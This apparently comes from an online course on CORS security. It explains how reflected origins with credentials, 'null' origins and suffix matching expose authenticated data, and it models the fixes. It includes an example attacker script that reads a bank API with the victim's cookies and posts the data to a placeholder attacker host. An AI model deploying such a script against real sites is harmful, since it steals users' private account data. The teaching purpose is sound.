CORS Internals and Security

Real-World CORS Attack Scenarios


Understanding how CORS can be exploited is essential for anyone responsible for web security. Attackers actively look for sites with CORS misconfigurations because they turn the browser itself into the attack vector. A misconfigured policy lets a malicious page read responses from a protected origin, bypassing the same-origin policy that browsers enforce by default. When a server trusts the wrong origins, or validates the Origin header carelessly, an attacker can read data, and sometimes trigger actions, with the victim's own session.

Consider a scenario where a popular banking website misconfigures its CORS policy so that it accepts any origin: the server copies whatever value arrives in the request's Origin header into Access-Control-Allow-Origin and also sends Access-Control-Allow-Credentials: true. (A bare wildcard "*" is a weaker misconfiguration: browsers refuse to combine "*" with credentials, so it exposes only responses that do not depend on the victim's cookies.) An attacker creates a malicious website designed to lure users who are currently logged in to the bank. When a victim visits the attacker's site, hidden JavaScript sends a cross-origin request to the bank's API endpoint that returns sensitive account information. Because the response carries CORS headers that name the attacker's origin and permit credentials, the browser lets the attacker's JavaScript read it, exposing confidential data such as account balances or transaction history. This type of vulnerability can have severe consequences, including identity theft or financial loss.

// Malicious site JavaScript exploiting a vulnerable CORS configuration.
// Runs on https://attacker.com while the victim is logged in to the bank.
fetch("https://vulnerable-bank.com/api/account", {
  credentials: "include" // attach the victim's bank cookies to the request
})
  // The browser only lets this .json() call succeed if the bank's response
  // carries Access-Control-Allow-Origin: https://attacker.com (for example a
  // reflected Origin) together with Access-Control-Allow-Credentials: true.
  .then(response => response.json())
  .then(data => {
    // Attacker forwards the stolen account data to a server they control
    fetch("https://attacker.com/steal", {
      method: "POST",
      body: JSON.stringify(data),
      headers: { "Content-Type": "application/json" }
    });
  });

In the attack example above, the attacker's site sends a fetch request to the bank's API while the victim is logged in. The credentials: "include" option ensures that the victim's authentication cookies are sent with the request. If the bank's server responds with Access-Control-Allow-Origin set to the attacker's origin (typically because it reflects the Origin header) together with Access-Control-Allow-Credentials: true, the browser grants the JavaScript access to the sensitive data in the response, and the script forwards it to the attacker's server. A wildcard alone would not be enough here, because the browser rejects "*" on a credentialed response. The exploited weakness is the server's failure to restrict allowed origins to an exact allowlist; the same failure appears when a server trusts the "null" origin (which a sandboxed iframe can produce) or matches origins by substring or suffix. A quick check for the weakness is to send a request with an arbitrary value in the Origin header and see whether the server echoes it back alongside the credentials header; a correctly configured server also sends Vary: Origin so that a cached response for one origin is never served to another.
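To make the difference between these configurations concrete, here is an added example that is not code from the original page and does not describe any real bank. It models the server side's CORS decision for several policies next to a simplified version of the browser's own CORS check, so you can see exactly which server responses let the attacker page above read the data. The origins vulnerable-bank.com, app.vulnerable-bank.com and attacker.com are placeholders, and the policy functions and browserCanReadResponse are hypothetical names. It goes slightly beyond the text by also showing a suffix-matching validator, another common CORS mistake.

```javascript
// Added example: model of server CORS policies vs. the browser's CORS check.
// All origins below are constructed placeholders.
const BANK_ORIGIN = "https://vulnerable-bank.com";
const ALLOWED_ORIGINS = new Set([BANK_ORIGIN, "https://app.vulnerable-bank.com"]);

// Vulnerable: reflects whatever Origin the request carries (including "null")
// and also allows credentials, so any site can read authenticated responses.
function corsHeadersReflecting(origin) {
  if (origin === undefined) return {};
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
  };
}

// Wildcard: browsers refuse "*" on credentialed requests, so cookie-protected
// data stays unreadable, but anything served without cookies is public.
function corsHeadersWildcard() {
  return { "Access-Control-Allow-Origin": "*" };
}

// Also vulnerable: a suffix check accepts https://evilvulnerable-bank.com,
// which an attacker can simply register.
function corsHeadersSuffixMatch(origin) {
  if (typeof origin === "string" && origin.endsWith("vulnerable-bank.com")) {
    return {
      "Access-Control-Allow-Origin": origin,
      "Access-Control-Allow-Credentials": "true",
    };
  }
  return {};
}

// Hardened: exact match against an allowlist, never "null", and Vary: Origin
// so a cache never hands one origin's headers to another.
function corsHeadersAllowlist(origin) {
  if (!ALLOWED_ORIGINS.has(origin)) return { Vary: "Origin" };
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
    Vary: "Origin",
  };
}

// Simplified browser-side CORS check (as in the Fetch standard): the script
// may read the body only if the response headers name its origin, and, for a
// credentialed request, "*" is not accepted and ACAC must be exactly "true".
function browserCanReadResponse(requestOrigin, withCredentials, headers) {
  const acao = headers["Access-Control-Allow-Origin"];
  if (acao === undefined) return false;
  if (withCredentials) {
    if (acao === "*" || acao !== requestOrigin) return false;
    return headers["Access-Control-Allow-Credentials"] === "true";
  }
  return acao === "*" || acao === requestOrigin;
}

// Does the attacker page's credentialed fetch (as on the page above) get to
// read the bank's response under a given server policy?
function attackSucceeds(policy, attackerOrigin = "https://attacker.com") {
  return browserCanReadResponse(attackerOrigin, true, policy(attackerOrigin));
}

// Summary of every policy against the default attacker origin.
function evaluatePolicies() {
  return {
    reflecting: attackSucceeds(corsHeadersReflecting),
    wildcard: attackSucceeds(corsHeadersWildcard),
    suffixMatch: attackSucceeds(corsHeadersSuffixMatch),
    allowlist: attackSucceeds(corsHeadersAllowlist),
  };
}
```

Running evaluatePolicies() reports that only the reflecting policy lets https://attacker.com read the account data, but attackSucceeds(corsHeadersSuffixMatch, "https://evilvulnerable-bank.com") and attackSucceeds(corsHeadersReflecting, "null") both succeed too, which is why the hardened version compares the full origin string against a fixed set rather than testing parts of it.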

Section 3. Chapter 2

Ask AI

expand

Ask AI

ChatGPT

Ask anything or try one of the suggested questions to begin our chat

Section 3. Chapter 2
some-alt